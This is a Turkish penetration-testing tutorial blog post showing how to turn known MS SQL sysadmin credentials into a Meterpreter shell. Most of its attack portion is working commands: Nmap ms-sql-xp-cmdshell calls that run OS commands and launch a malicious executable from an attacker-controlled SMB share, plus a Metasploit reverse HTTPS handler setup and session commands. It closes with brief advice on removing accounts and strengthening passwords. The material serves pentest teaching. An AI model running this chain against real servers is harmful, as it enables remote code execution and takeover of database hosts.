Nmap ms-sql-xp-cmdshell Betiği ve Elde Edilen MS SQL Veritabanı Kimlik Bilgileri ile MS SQL Veritabanı Sunucusuna Meterpreter Bağlantısı Elde Edilmesi

Sızma testleri sırasında, bir şekilde elde edilen kimlik bilgileri (kullanıcı adı ve parola) kullanılarak MS SQL veritabanı uygulamasına erişim sağlanmaya çalışılır. Bu yazıda erişim bilgileri (IP, kullanıcı adı ve parolası) elde edilmiş bir MS SQL veritabanı sunucusuna Nmap ms-sql-xp-cmdshell betiği ile Meterpreter bağlantısı gerçekleştirilecektir.

Bu yazıda kullanılacak Kali bilgisayarın IP adresi 172.22.71.5, MS SQL veritabanının kurulu olduğu Windows Server 2008 R2 sunucunun IP adresi ise 172.22.71.247 olduğu ve sysadmin rolündeki “test” veritabanı hesabının parolasının “test” olarak tespit edildiğini varsayalım.

Nmap ms-sql-xp-cmdshell betiğinin genel seçenekleri aşağıdaki gibi ayarlanıp çalıştırılabilir.

nmap 172.22.71.247 -p1433 –script ms-sql-xp-cmdshell –script-args=mssql.username=test,mssql.password=test,ms-sql-xp-cmdshell.cmd=’whoami && net user’

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-nmap-ms-sql-xp-cmdshell-script-01

Yukarıdaki ekran görüntüsünde 2 adet komut (“whoami” ve “net user”) çalıştırılmıştır. Bunun yerine, paylaşımdaki zararlı bir yazılım çalıştırılabilir ve bekleyen multi/handler tarafından bu talep yakalanabilir.

Meterpreter komut satırı elde etmek için ve saldırgana ait Kali bilgisayara ters HTTPS Meterpreter bağlantısı kuracak olan zararlı bir uygulama dosyasının oluşturulduğunu varsayalım. Bu uygulama Nmap ms-sql-xp-cmdshell betiğine parametre olarak verilecek ve çalışması sağlanacaktır.

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-nmap-ms-sql-xp-cmdshell-script-02

Kali sunucuda SAMBA sunucu uygulamasının yüklü olduğunu varsayalım. Kali bilgisayarda, “paylasim$” adlı gizli bir paylaşım dizinine herkes (everyone) için okuma ve yazma izni verilmiş olsun.

Oluşturulan uygulamanın gerçekleştireceği ters HTTPS Meterpreter bağlantısını dinleyecek olan MSF multi-handler istismar modülü aşağıdaki gibi ayarlanabilir.

use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 172.22.71.5
set LPORT 443
set ExitOnSession false
exploit -j

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-nmap-ms-sql-xp-cmdshell-script-03

Nmap ms-sql-xp-cmdshell betiği paylaşımdaki uygulamayı başlatması için aşağıdaki gibi ayarlanıp çalıştırılabilir.

nmap 172.22.71.247 -p1433 –script ms-sql-xp-cmdshell –script-args=mssql.username=test,mssql.password=test,ms-sql-xp-cmdshell.cmd=’start \\172.22.71.5\paylasim$\Zararli1.exe’

Böylece, MSF multi-handler istismar modülü üzerinde gelen talep yakalanmıştır.

sessions
sessions -i 1
getuid

obtaining-meterpreter-session-by-using-obtained-ms-sql-database-authentication-informations-via-nmap-ms-sql-xp-cmdshell-script-05

Böylece Kali bilgisayarın diskinde bulunan zararlı yazılım, Windows makinenin diskine kaydedilmeden, Windows bilgisayarın belleğinde (RAM) çalışacaktır. Sonuçta da ters bir HTTPS bağlantı talebi olacak, Kali üzerindeki dinleyici tarafından yakalanmıştır. Ayrıca yukarıdaki ekran görüntüsünde de görüldüğü gibi MS SQLSERVER servisini çalıştıran hesabın yetkileri ile Meterpreter bağlantısı elde edilmiştir. Eğer MS SQLSERVER servisi SYSTEM yetkileri ile çalışmış olsaydı, SYSTEM yetkileri elde edilirdi. Bunun yanında “sa” hesabı yerine, işletim sisteminde kod çalıştırma yetkisi olan başka bir hesap da kullanılabilirdi. Bu sebeple, gereksiz kullanıcı hesaplarının ve yetkilerinin kaldırılması, mevcut parolaların oldukça karmaşık olması tavsiye edilmektedir.

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.